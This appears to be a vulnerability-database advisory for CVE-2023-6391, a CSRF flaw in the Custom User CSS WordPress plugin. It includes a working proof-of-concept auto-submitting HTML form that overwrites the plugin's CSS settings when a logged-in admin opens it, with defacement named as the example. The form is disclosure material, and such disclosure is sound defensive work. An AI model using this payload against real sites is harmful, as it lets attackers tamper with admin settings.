Custom User CSS <= 0.2 – Settings Update via CSRF | CVE 2023-6391 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

Create an HTML form with the following content and make a logged in admin open it

<form action="https://example.com/wp-admin/themes.php?page=custom-user-css/custom_user_css.php" method="POST">
    <input type="text" name="custom_user_css_css" value="overwritten css, for example for defacement">
    <input type="text" name="action" value="update">
    <input type="text" name="page_options" value="custom_user_css_css">
</form>
<script>
    document.forms[0].submit();
</script>

Affects Plugins

custom-user-css

No known fix

References

CVE

URL

https://magos-securitas.com/txt/CVE-2023-6391.txt

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://magos-securitas.com

Verified

Yes

WPVDB ID

4098b18d-6ff3-462c-af05-48adb6599cf3

Timeline

Publicly Published

2024-01-03 (about 1 year ago)

Added

2024-01-03 (about 1 year ago)

Last Updated

2024-01-04 (about 1 year ago)

Other

Published

Title

Published

2023-07-14

Title

WP Testimonials < 1.4.3 - Widget Deletion via CSRF

Published

2024-07-11

Title

Event post < 5.9.11 - Post Metadata Update via CSRF

Published

2024-02-16

Title

Microsoft Clarity < 0.9.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2022-06-01

Title

My Private Site < 3.0.8 - Arbitrary Settings Update via CSRF

Published

2025-03-04

Title

bbPress < 2.6.12 - Cross-Site Request Forgery to Limited Privilege Escalation